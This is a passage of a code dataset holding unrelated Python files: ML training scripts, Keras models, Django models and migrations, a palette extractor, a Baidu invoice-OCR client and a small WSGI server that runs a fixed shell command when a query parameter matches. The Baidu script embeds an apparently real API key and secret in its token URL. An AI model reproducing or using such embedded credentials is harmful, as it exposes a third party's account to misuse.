self.setFrameShadow(QFrame.Raised)\n self.setLineWidth(6)\n self.setMidLineWidth(2)\n\n def sizeHint(self):\n return QtCore.QSize(6, 8)\n\nhashmal_style = '''\n\nQStatusBar[hasError=true], QLineEdit[hasError=true] {\n background: rgba(255, 0, 0, 25%);\n}\n'''\n","sub_path":"hashmal_lib/gui_utils.py","file_name":"gui_utils.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"348531237","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nExercise: simple divide\r\n\r\n\"\"\"\r\n\r\ndef fancy_divide(list_of_numbers, index):\r\n denom = list_of_numbers[index]\r\n return [simple_divide( item, denom) for item in list_of_numbers]\r\n\r\n\r\ndef simple_divide(item, denom):\r\n \r\n try:\r\n return item / denom\r\n \r\n except ZeroDivisionError:\r\n return 0\r\n \r\n\r\n \r\n except Exception as ex:\r\n print(ex)\r\n \r\n \r\n\r\nprint(fancy_divide([0, 2, 4], 1))","sub_path":"Week_4-Good_Programming_Practices/Exercise_simple _divide.py","file_name":"Exercise_simple _divide.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"624220237","text":"import numpy as np\nimport cv2 as cv\nfrom mylib import h5Handler\nfrom mylib import read_frame\n\ndump_path = '../preProcess/dump_dir.txt'\ndec_path = '../../raw_data/dec.yuv'\ngt_path = '../../raw_data/video.yuv'\ntarget_path = '../img/'\n\nplanar_h5_path = '../../train64/planar.h5'\ndc_h5_path = '../../train64/dc.h5'\nangle_h5_path = '../../train64/angle.h5'\n\nheight = 1024\nwidth = 1792\nblock_size = 32\n\n# define 3 mode\nplanar_mode = 0\ndc_mode = 1\nangle_mode = 2\n\n\n\ndef filter_sample(img, threshold):\n # var = np.var(img)\n # if var > threshold:\n # return True\n # else:\n # return False\n pass\n\ninput = np.zeros([96, 96])\nlabel = np.zeros([32, 32])\ntest_img = np.zeros([64,64])\ndcvars = []\nplanarvars = []\nanglevars = []\n\nplanarinput = np.zeros([2000, 96, 96])\nplanarlabel = np.zeros([2000, 32, 32])\ndcinput =np.zeros([2000, 96, 96])\ndclabel = np.zeros([2000, 32, 32])\nangleinput = np.zeros([2000, 96, 96])\nanglelabel = np.zeros([2000, 32, 32])\n\nplanar_handler = h5Handler(planar_h5_path)\ndc_handler = h5Handler(dc_h5_path)\nangle_handler = h5Handler(angle_h5_path)\n# # --------------for debug------------------\n# cnt = 0\n# datas = np.zeros([20, 3072, 1, 1])\n# labels = np.zeros([20, 1024, 1, 1])\n# flag = True \n# handler = h5Handler('/home/hyz/lab/intra/train/train.h5') \n# # --------------for debug------------------\n\nwith open(dump_path) as f:\n while True:\n line = f.readline()\n if line == '':\n break\n [f_id, y, x, mode] = line.split()\n y = int(y)\n x = int(x)\n f_id = int(f_id)\n mode = int(mode)\n # --------------for debug------------------\n \t#if f_id > 5:\n # break\n # --------------for debug------------------\n\n if y == 0 and x == 0:\n pc = 0\n dc = 0\n ac = 0\n\n gt_img = read_frame(gt_path, f_id, height, width)\n dec_img = read_frame(dec_path, f_id, height, width)\n print(f_id)\n # Abort the most outsize row and column\n if x == 0 or y == 0 or x == 992 or y == 1760:\n continue\n # print([x, y])\n input = dec_img[x-block_size:x+2*block_size,y-block_size:y+2*block_size] / 255.0\n label = gt_img[x:x+block_size,y:y+block_size] / 255.0\n\n\n # --------------for debug------------------(write data to hdf5 file)\n # datas[cnt:cnt + 1, :, :, :] = input / 255.0\n # labels[cnt:cnt + 1, :, :, :] = label / 255.0\n # cnt += 1\n # if cnt == 20:\n # if 
flag:\n # handler.write(datas, label, create=True)\n # print('$$$$$$$$$$$ new h5 file constructed $$$$$$$$$$$$')\n # flag = False\n # else:\n # handler.write(datas, labels, create=False)\n # print('$$$$$$$$$$$ add data to existed h5 file constructed $$$$$$$$$$$$')\n # cnt = 0\n # --------------for debug------------------(write data to hdf5 file)\n\n if mode == planar_mode:\n planarinput[pc, :, :] = input\n planarlabel[pc, :, :] = label\n pc = pc + 1\n planarvars.append(np.var(test_img))\n elif mode == dc_mode:\n dcinput[dc, :, :] = input\n dclabel[dc, :, :] = label\n dc = dc + 1\n dcvars.append(np.var(test_img))\n else:\n angleinput[ac, :, :] = input\n anglelabel[ac, :, :] = label\n ac = ac + 1\n anglevars.append(np.var(test_img))\n # cv.imwrite(target_path + str(y) + '_' + str(x) + '.png', test_img)\n\n # Then check if we have arrive the final block of this frame\n if y == 1728 and x == 960:\n # now begin to write data to the h5 file\n if f_id == 0:\n # create mode\n planar_handler.write(planarinput[:pc,:,:], planarlabel[:pc,:,:], create=True)\n dc_handler.write(dcinput[:dc,:,:], dclabel[:dc,:,:], create=True)\n angle_handler.write(angleinput[:ac,:,:], anglelabel[:ac,:,:], create=True)\n else:\n # append mode\n planar_handler.write(planarinput[:pc,:,:], planarlabel[:pc,:,:], create=False)\n dc_handler.write(dcinput[:dc,:,:], dclabel[:dc,:,:], create=False)\n angle_handler.write(angleinput[:ac,:,:], anglelabel[:ac,:,:], create=False)\n print('In this frame %d: planar: %d, dc: %d, angle: %d'%(f_id, pc, dc, ac))\n\n\nprint('------------ print statistic data -------------')\nprint('planar var: ', np.mean(planarvars), len(planarvars))\nprint('dc var: ', np.mean(dcvars), len(dcvars))\nprint('angle var: ', np.mean(anglevars), len(anglevars))\n\n\n","sub_path":"tf64/generate_data.py","file_name":"generate_data.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"113020428","text":"\"\"\" Image downloader for Facebook \"\"\"\n# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport timeit\nfrom argparse import ArgumentParser\n\nfrom lib.const import Files\nfrom lib.gallery_crawler import GalleryCrawler\n\n\ndef main():\n \"\"\" Traverse the galleries \"\"\"\n args = _parse_args()\n try:\n with open(Files.OPTIONS.value) as options_file:\n options = json.load(options_file)\n if args.url:\n options['start_images'] = args.url,\n crawler = GalleryCrawler(options)\n crawler.run()\n except FileNotFoundError:\n logging.error(\n \"You should create your own %s from %s!\",\n Files.OPTIONS.value,\n Files.OPTIONS_TEMPLATE.value\n )\n\n\ndef _parse_args():\n parser = ArgumentParser()\n parser.add_argument('-u', '--url', type=str, help='Start image URL.')\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n print(\"[Facebook Gallery Downloader v0.3]\")\n START = timeit.default_timer()\n main()\n STOP = timeit.default_timer()\n print(\"[ Time taken: %ss ]\" % str(STOP - START))\n input(\"Press any key to continue...\")\n","sub_path":"traverse_gallery.py","file_name":"traverse_gallery.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"612699867","text":"# convert 123 to \"123\"\n# mod 3\n# integer division\n\n\ndef num(n):\n str = \"\"\n while n > 0:\n new_num = n % 10\n str = chr(48 + new_num) + str\n n = n // 10\n return str\n\n\ns = 
num(123)\nprint(s)\n","sub_path":"convert_int_to_str.py","file_name":"convert_int_to_str.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"238048861","text":"import argparse\nfrom PIL import Image, ImageDraw, ImageFont\nfrom collections import Counter\n\n# returns a list of 4 representative colors sampled from the most common\n# colors in the image, in descending frequency order, in (R,G,B) format\ndef get_colors(file):\n\tim = Image.open(file, 'r')\n\twidth, height = im.size\n\tvalues = list(im.getdata())\n\t\n\tif len(values) > 5000:\n\t\tcolors = [val for val, v in Counter(values).most_common(5000)]\n\telif len(values) > 500:\n\t\tcolors = [val for val, v in Counter(values).most_common(1000)]\n\telse:\n\t\tcolors = [val for val, v in Counter(values).most_common(4)]\n\t# most_common() may return fewer entries than requested, so pick\n\t# indices relative to the number of colors actually found\n\tn = len(colors)\n\tfinal_colors = [colors[0], colors[n//5], colors[(3*n)//5], colors[n-1]]\n\treturn final_colors\n\ndef create_palette(colors):\n\tim2 = Image.new(\"RGB\", (400,400))\n\tdraw = ImageDraw.Draw(im2)\n\t\n\t# draw the actual colors\n\tdraw.rectangle((0, 0, 400, 100), fill=colors[0])\n\tdraw.rectangle((0, 100, 400, 200), fill=colors[1])\n\tdraw.rectangle((0, 200, 400, 300), fill=colors[2])\n\tdraw.rectangle((0, 300, 400, 400), fill=colors[3])\n\t\n\tfont = ImageFont.truetype(\"arial.ttf\", 20)\n\n\t# write the R,G,B values of the color on its corresponding color\n\tdraw.text((0, 49), str(colors[0]), font=font, fill=\"white\")\n\tdraw.text((1, 50), str(colors[0]), font=font, fill=\"black\")\n\tdraw.text((0, 149), str(colors[1]), font=font, fill=\"white\")\n\tdraw.text((1, 150), str(colors[1]), font=font, fill=\"black\")\n\tdraw.text((0, 249), str(colors[2]), font=font, fill=\"white\")\n\tdraw.text((1, 250), str(colors[2]), font=font, fill=\"black\")\n\tdraw.text((0, 349), str(colors[3]), font=font, fill=\"white\")\n\tdraw.text((1, 350), str(colors[3]), font=font, fill=\"black\")\n\t\n\tim2.save(\"palette.png\")\n\t\n\tprint(\"Success. 
View 'palette.png' in the local directory for your colors.\")\n\t\n\nif __name__=='__main__':\n\t# handle argument input\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-i\", \"--image\", help=\"path to the image\", required=True)\n\targs = parser.parse_args()\n\tif args.image:\n\t\tusr_image = args.image\n\t\n\tcolors = get_colors(usr_image)\n\tcreate_palette(colors)\n","sub_path":"Palette-Grab.py","file_name":"Palette-Grab.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"640212059","text":"from keras.layers import Input, LSTM, ConvLSTM2D, Conv3D, BatchNormalization\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras import backend as K\n\ndef get_description():\n desc = [\"4 layers without batch normalizaion:\"]\n desc.append(\"convlstm - 128 filters\")\n desc.append(\"convlstm - 64 filters\")\n desc.append(\"convlstm - 64 filters\")\n desc.append(\"conv3d - 1 filters\")\n desc.append(\"Using mean squared error but saving metrics see if theres\")\n desc.append(\"a difference when using normal convolutional layer\")\n desc.append(\"Removed batch normalization since the batchsize is small\")\n return '\\n'.join(desc)\n\ndef get_model(sequence_length, img_width, img_height):\n model = _build_network(sequence_length, img_width, img_height)\n model.compile(\n loss='mean_squared_error',\n optimizer='adadelta',\n metrics=[\n 'accuracy',\n # 'mean_squared_error',\n 'mean_absolute_error',\n 'mean_absolute_percentage_error',\n 'mean_squared_logarithmic_error',\n 'squared_hinge',\n 'hinge',\n 'logcosh',\n # 'huber_loss',\n 'sparse_categorical_crossentropy',\n 'binary_crossentropy',\n 'kullback_leibler_divergence',\n 'poisson',\n 'cosine_proximity',\n ]\n )\n return model\n\ndef _build_network(sequence_length, img_width, img_height):\n model = Sequential()\n model.add(\n ConvLSTM2D(\n filters=128,\n kernel_size=(3,3),\n input_shape=(sequence_length, img_width, img_height, 1),\n padding='same',\n return_sequences=True,\n )\n )\n model.add(\n ConvLSTM2D(\n filters=64,\n kernel_size=(3,3),\n padding='same',\n return_sequences=True,\n )\n )\n model.add(\n ConvLSTM2D(\n filters=64,\n kernel_size=(3,3),\n padding='same',\n return_sequences=True,\n )\n )\n model.add(\n Conv3D(filters=1,\n kernel_size=(3,3,3),\n activation='sigmoid',\n padding='same',\n data_format='channels_last',\n )\n )\n return model\n\n","sub_path":"models/four-layer-test-3d-layer-no-batch-metrics.py","file_name":"four-layer-test-3d-layer-no-batch-metrics.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"446519642","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('gorod', '0012_auto_20150804_0955'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='userinfo',\n options={'verbose_name': '\\u041f\\u0440\\u043e\\u0444\\u0438\\u043b\\u044c', 'verbose_name_plural': '\\u041f\\u0440\\u043e\\u0444\\u0438\\u043b\\u0438'},\n ),\n migrations.AddField(\n model_name='userinfo',\n name='user',\n field=models.ForeignKey(verbose_name='\\u0427\\u0435\\u043b\\u043e\\u0432\\u0435\\u043a', 
blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"src/gorod/migrations/0013_auto_20150812_1404.py","file_name":"0013_auto_20150812_1404.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"210737638","text":"\"\"\"Updated navigation module with dual language\n\nRevision ID: 3769b81bfaf\nRevises: aeceb6e193\nCreate Date: 2015-07-21 13:49:01.970788\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '3769b81bfaf'\ndown_revision = 'aeceb6e193'\n\n\ndef upgrade():\n # commands auto generated by Alembic - please adjust! ###\n op.alter_column('nagivation_entry', 'title',\n new_column_name='nl_title',\n existing_type=sa.String(length=256))\n\n op.add_column('nagivation_entry',\n sa.Column('en_title', sa.String(length=256), nullable=True))\n # end Alembic commands ###\n\n\ndef downgrade():\n # commands auto generated by Alembic - please adjust! ###\n op.alter_column('nagivation_entry', 'nl_title',\n new_column_name='title',\n existing_type=sa.String(length=256))\n op.drop_column('nagivation_entry', 'en_title')\n # end Alembic commands ###\n","sub_path":"migrations/versions/2015_07_21_3769b81bfaf_updated_navigation_module_with_dual_.py","file_name":"2015_07_21_3769b81bfaf_updated_navigation_module_with_dual_.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"62261835","text":"import numpy as np\nfrom data.Vertebral_column import load_data_1\nfrom data.common import load_data\n# import trainning_of_adaboost as toa\nimport svm\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, roc_auc_score\nimport trainning_of_adaboost as toa\nfrom sklearn.ensemble import AdaBoostClassifier\n\n\n# X_train, X_test, y_train, y_test = load_data_1(\n # \"data/enable-data/Vertebral_column.csv\", 0.3)\n\nX_train, X_test, y_train, y_test = load_data(\n \"data/enable-data/co_author_08_new.csv\", 0.3)\n\nw, b = svm.fit(X_train, y_train, C=800)\ntest_pred = np.sign(X_test.dot(w)+b)\nprint(classification_report(y_test, test_pred))\nprint(roc_auc_score(y_test, test_pred))\n\nw, b, a = toa.fit(X_train, y_train, M=10, C=800, instance_categorization=False)\ntest_pred = toa.predict(X_test, w, b, a, M=10)\nprint(classification_report(y_test, test_pred))\nprint(roc_auc_score(y_test, test_pred))\n\nw, b, a = toa.fit(X_train, y_train, M=10, C=800, instance_categorization=True)\ntest_pred = toa.predict(X_test, w, b, a, M=10)\nprint(classification_report(y_test, test_pred))\nprint(roc_auc_score(y_test, test_pred))\n\n\n# test SVM\n# model = SVC(kernel='linear', C=100)\n# model.fit(X_train, y_train)\n# test_svmpred = model.predict(X_test)\n# test_accuracy = classification_report(y_test, test_svmpred)\n# print(test_accuracy)\n\n\nclf = AdaBoostClassifier(SVC(kernel='linear', C=800),\n n_estimators=10, algorithm='SAMME')\nclf.fit(X_train, y_train)\ntest_adapred = clf.predict(X_test)\nprint(classification_report(y_test, test_adapred))\nprint(roc_auc_score(y_test, test_adapred))\n","sub_path":"adaboost/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"9710760","text":"# 计算DB指数,暂时没用上\nimport numpy as np\n\ndef euclidean_dist(vec1, vec2):\n return np.sqrt(np.sum(np.square(vec1 - 
vec2)))\n\ndef avg_dist_intra_cluster(cluster):\n    \"\"\"Computes the average intra-cluster distance, which is necessary to compute\n    the DBI.\n    Args:\n        cluster: A cluster = {x1, x2,..., xk}. xi is a row.\n    Returns:\n        A float number of average intra-cluster distance.\n    \"\"\"\n    sigma = 0\n    size = cluster.shape[0]\n    for i in range(size):\n        for j in range(size):\n            if i < j:\n                sigma += euclidean_dist(cluster[i], cluster[j])\n    return 2 * sigma / (size * (size - 1))\n\ndef center_point(cluster):\n    center = np.sum(cluster, axis=0) / cluster.shape[0]\n    return center\n\ndef dist_inter_cluster(cluster1, cluster2):\n    \"\"\"Computes the distance of center points of two clusters.\n    Args:\n        cluster1, cluster2: A cluster = {x1, x2,..., xk}. xi is a row.\n    Returns:\n        A float number of the inter-cluster distance.\n    \"\"\"\n    center1 = center_point(cluster1)\n    center2 = center_point(cluster2)\n    distance = euclidean_dist(center1, center2)\n    return distance\n\n\ndef dbi(cluster1, cluster2):\n    \"\"\"Computes the Davies-Bouldin Index of two clusters.\n    Args:\n        cluster1, cluster2: A cluster = {x1, x2,..., xk}. xi is a row.\n    Returns:\n        A float number of Davies-Bouldin Index.\n    \"\"\"\n    index = ((avg_dist_intra_cluster(cluster1) + \n              avg_dist_intra_cluster(cluster2)) / \n             dist_inter_cluster(cluster1, cluster2))\n    return index","sub_path":"backend/algorithm/step/calDB.py","file_name":"calDB.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"581021179","text":"\n\nfrom xai.brain.wordbase.nouns._obscenity import _OBSCENITY\n\n#class header\nclass _OBSCENITIES(_OBSCENITY, ):\n\tdef __init__(self,): \n\t\t_OBSCENITY.__init__(self)\n\t\tself.name = \"OBSCENITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"obscenity\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_obscenities.py","file_name":"_obscenities.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"507127083","text":"from django.db import models\n\nfrom django.contrib.auth.models import User\n# Create your models here.\nclass Post(models.Model):\n    user = models.ForeignKey(User)\n    dpicture = models.FileField(upload_to='dogpictures')\n    phone = models.IntegerField(null=False)\n    body = models.TextField()\n    dstatus = models.CharField(max_length=400)\n    dbreed = models.CharField(max_length=200)\n    dage = models.IntegerField()\n    closed = models.BooleanField(default=False)\n    datetime = models.DateTimeField(auto_now_add=True)\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"584002800","text":"# encoding:utf-8\n\nimport requests\nimport base64\nimport time\n'''\nVAT invoice recognition\n'''\n# client_id is the AK obtained from the official site, client_secret is the SK obtained from the official site\nhost = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id=mvS45wexdDMRH656dIfdhoN4&client_secret=ylWi4rCGbAGbFDpSOgDpfnCXSyWxGdsB'\nresponse = requests.get(host)\nif response:\n    request_url = \"https://aip.baidubce.com/rest/2.0/ocr/v1/vat_invoice\"\n    # open the image file in binary mode\n    f = open('./data/00001.png', 'rb')\n    img = base64.b64encode(f.read())\n\n    params = {\"image\":img}\n    access_token = response.json()['access_token']\n    request_url = request_url + \"?access_token=\" + access_token\n    headers = {'content-type': 'application/x-www-form-urlencoded'}\n    start = 
time.time()\n response = requests.post(request_url, data=params, headers=headers)\n if response:\n print (response.json())\n print('time:', time.time() - start)","sub_path":"baidu_api.py","file_name":"baidu_api.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"376211242","text":"# Copyright 2013 Jake Basile\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Interacts with the GitHub User API.\"\"\"\n\nimport ghcl.auth\nimport urlparse\nimport requests\n\ndef init_subparser(subparsers):\n user = subparsers.add_parser('user', help='Interact with users.')\n user_sub = user.add_subparsers(title='User commands')\n who = user_sub.add_parser('who', help='Find out who a user is.')\n who.set_defaults(func=perform_who)\n\ndef perform_who(args):\n token = ghcl.auth.get_token()\n if token == None:\n print('You are not yet logged in.')\n return\n if args.org != None:\n print('Cannot perform this action on an organization.')\n return\n if args.user != None:\n request_url = urlparse.urljoin(args.uri, '/users/{}'.format(args.user))\n else:\n request_url = urlparse.urljoin(args.uri, '/user')\n result = requests.get(\n request_url,\n headers = {\n 'Authorization': 'Bearer ' + token,\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n },\n )\n if result.status_code != 200:\n print('Something went wrong, try again.')\n print(result.reason)\n else:\n resultjson = result.json()\n print('User: {un} ({id})'.format(un=resultjson['login'], id=resultjson['id']))\n print('Name: {}'.format(resultjson['name']))\n print('Company: {}'.format(resultjson['company']))\n print(\n 'Repos: {pub} public / {pri} private'.format(\n pub=resultjson['public_repos'],\n pri=resultjson['total_private_repos'] if args.user == None else 'NA',\n )\n )\n print(\n 'Gists: {pub} public / {pri} private'.format(\n pub=resultjson['public_gists'],\n pri=resultjson['private_gists'] if args.user == None else 'NA',\n )\n )\n\n","sub_path":"ghcl/user/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"279401617","text":"from stable_baselines3.common.env_util import make_atari_env\nfrom stable_baselines3.common.vec_env import VecFrameStack, DummyVecEnv, VecVideoRecorder, VecMonitor\nfrom stable_baselines3.common.monitor import Monitor\nfrom stable_baselines3.common.atari_wrappers import AtariWrapper\nfrom stable_baselines3 import A2C\nfrom stable_baselines3 import DQN\nimport wandb\nfrom wandb.integration.sb3 import WandbCallback\n\n# There already exists an environment generator\n# that will make and wrap atari environments correctly.\n# Here we are also multi-worker training (n_envs=4 => 4 environments)\n\nconfig = {\n \"policy_type\":\"CnnPolicy\",\n \"total_timesteps\":10000,\n \"env_name\":\"PongNoFrameskip-v4\"\n}\n\nrun = wandb.init(\n project=\"dqn_project\",\n config=config,\n 
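# sync_tensorboard mirrors SB3's tensorboard logging into this W&B run\n    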
sync_tensorboard=True,\n monitor_gym=True,\n save_code=True,\n)\n\ndef make_env():\n env = make_atari_env('PongNoFrameskip-v4')\n #env = AtariWrapper('PongNoFrameskip-v4')\n #env = VecFrameStack(env, n_stack=4)\n #env = VecMonitor(env)\n return env\n\nenv = make_env()\nenv = VecVideoRecorder(env, f\"videos/{run.id}\", record_video_trigger=lambda x: x % 2000 == 0, video_length=200)\n\n# Frame-stacking with 4 frames\n#env = VecFrameStack(env, n_stack=4)\n\nmodel = DQN('CnnPolicy', env, verbose=1, tensorboard_log=f'runs/{run.id}')\nmodel.learn(\n total_timesteps=config[\"total_timesteps\"],\n callback=WandbCallback(\n gradient_save_freq=100,\n model_save_path=f\"models/{run.id}\",\n verbose=2,\n ),\n)\nrun.finish()\n","sub_path":"baselines/simple_baseline.py","file_name":"simple_baseline.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"591978920","text":"import numpy as np \nimport tensorflow as tf\nimport pandas\nimport sys\nimport json\nimport h5py\n\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.utils import to_categorical\n\nimport pdb\n\ntarget_name_dict = {'stat.AP' : 0,\n 'stat.CO' : 1,\n 'stat.ME' : 2,\n 'stat.ML' : 3,\n 'stat.OT' : 4\n }\n\nlabel2target = { v:k for k,v in target_name_dict.items()}\n\nfiles = [\"../data/2015ml.h5\",\n \"../data/2016ml.h5\",\n \"../data/2017ml.h5\",\n \"../data/2018ml.h5\",\n \"../data/2019ml.h5\",\n ]\n\n\nabstracts = []\nlabels = []\nfor f in files:\n\n store = pandas.HDFStore(f)\n #import pdb\n #pdb.set_trace()\n df = store['/df']\n store.close()\n\n abstracts += list(df['abstract'])\n labels = np.hstack([labels,np.array(df['categories'])])\n\n\nlabels = np.asarray([item[0] for item in labels.tolist()])\n\n\nselected_labels = ['stat.AP', 'stat.CO', 'stat.ME', 'stat.ML', 'stat.OT']\n\n\nlabels_selected = np.asarray([item for item in labels.tolist() if item in selected_labels])\n\n\njj = 0 \nabstracts_selected = []\n\n\n\nfor item in labels.tolist(): \n if item in selected_labels:\n abstracts_selected.append(abstracts[jj])\n jj = jj + 1\n \nabstracts_selected = np.asarray(abstracts_selected)\n\n\nprint (np.unique(labels_selected))\nprint(\"---------\")\n\n\nlabels = labels_selected\n\n\n\nfor i in range(2):\n print(abstracts[i])\n print(target_name_dict[labels[i]])\n print(\"---------\")\n\n\nnum_words = 10000\ntokenizer = Tokenizer(num_words=num_words)\ntokenizer.fit_on_texts(abstracts)\nsequences = tokenizer.texts_to_sequences(abstracts)\nseq = pad_sequences(sequences, padding='post', value=0, maxlen=100)\n\n\n\n# Tokenizers come with a convenient list of words and IDs\ndictionary = tokenizer.word_index\n# Let's save this out so we can use it later\nwith open('dictionary_ML.json', 'w') as dictionary_file:\n json.dump(dictionary, dictionary_file)\n\n\n\nnp.random.seed(1234)\nind = np.random.randint(0, len(labels), len(labels))\nprint(ind.shape)\nlabels = labels[ind]\nseq = seq[ind,:]\n\n\n\n\nsplit_1 = int(0.8 * len(labels))\nsplit_2 = int(0.9 * len(labels))\ntrain_labels = labels[:split_1]\ndev_labels = labels[split_1:split_2]\ntest_labels = labels[split_2:]\n\ntrain_seq = seq[:split_1, :]\ndev_seq = seq[split_1:split_2, :]\ntest_seq = seq[split_2:, :]\n\n\n#%%\nvocab_size = 10000\n\n\n#%%\nmodel = keras.Sequential()\nmodel.add(keras.layers.Embedding(vocab_size, 
64))\nmodel.add(keras.layers.GlobalAveragePooling1D())\nmodel.add(keras.layers.Dense(64, activation=tf.nn.relu))\nmodel.add(keras.layers.Dense(5, activation=tf.nn.sigmoid))\nmodel.summary()\n\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n\n\ny_train_num = np.asarray([target_name_dict[x] for x in train_labels.tolist()])\ny_test_num = np.asarray([target_name_dict[x] for x in test_labels.tolist()])\n\ntrain_labels_onehot = to_categorical(y_train_num)\ntest_labels_onehot = to_categorical(y_test_num)\n\nhistory = model.fit(train_seq, train_labels_onehot, epochs=10, steps_per_epoch=32, validation_split=0.3, validation_steps=32)\n\n\n#%%\nev = model.evaluate(test_seq, test_labels_onehot, steps=10)\nprint(ev)\n\n\n#%%\ntext = [\"we present high dispersion spectroscopic data of the compact planetary nebula vy 1 2 where high expansion velocities up to 100 km s are found in the ha n ii and o iii emission lines hst images reveal a bipolar structure vy 1 2 displays a bright ring like structure with a size of 2 4 2 and two faint bipolar lobes in the west east direction a faint pair of knots is also found located almost on opposite sides of the nebula at pa degrees furthermore deep low dispersion spectra are also presented and several emission lines are detected for the first time in this nebula such as the doublet cl iii a k iv a c ii 6461 a the doublet c iv 5801 5812 a by comparison with the solar abundances we find enhanced n depleted c and solar o the central star must have experienced the hot bottom burning cn cycle during the 2nd dredge up phase implying a progenitor star of higher than 3 solar masses the ver\"]\n\n\n#%%\nseq_1 = tokenizer.texts_to_sequences(text)\n\n\n#%%\nseq_2 = pad_sequences(seq_1, padding='post', value=0, maxlen=350)\n\n\n#%%\nprob = model.predict(seq_2)\nprob /= prob.sum()\nprint(prob)\nii = np.argmax(prob)\nprint(label2target[ii])\n\n\n\n# serialize model to JSON\nmodel_json = model.to_json()\nwith open(\"model_ML.json\", \"w\") as json_file:\n json_file.write(model_json)\n\n# serialize weights to HDF5\nmodel.save('model_ML.h5')\n\nprint(\"Saved model to disk\")\n\n\n\n\n\n\n","sub_path":"exploration/train_data.py","file_name":"train_data.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"596497531","text":"#!/usr/bin/env python3\n\"\"\" defines function that concatenates two arrays \"\"\"\n\n\ndef cat_arrays(arr1, arr2):\n \"\"\" returns new list that is the concatenation of two arrays \"\"\"\n cat_array = []\n for i in arr1:\n cat_array.append(i)\n for i in arr2:\n cat_array.append(i)\n return cat_array\n","sub_path":"math/0x00-linear_algebra/6-howdy_partner.py","file_name":"6-howdy_partner.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"452842427","text":"from wsgiref.simple_server import make_server\nfrom cgi import parse_qs, escape\nimport os\n\n\n# 导入我们自己编写的application函数:\ndef application(environ, start_response):\n qs = parse_qs(environ[\"QUERY_STRING\"])\n test=qs.get(\"test\",['unkown'])[0]\n print(test)\n print(\"number\")\n if test == 'some':\n os.system('ls')\n print(\"yes\")\n start_response('200 OK', [('Content-Type', 'text/html')])\n return [b'haha']\n\n\n# 创建一个服务器,IP地址为空,端口是8000,处理函数是application:\nhttpd = make_server('', 8000, application)\nprint('Serving HTTP on port 8000...')\n# 
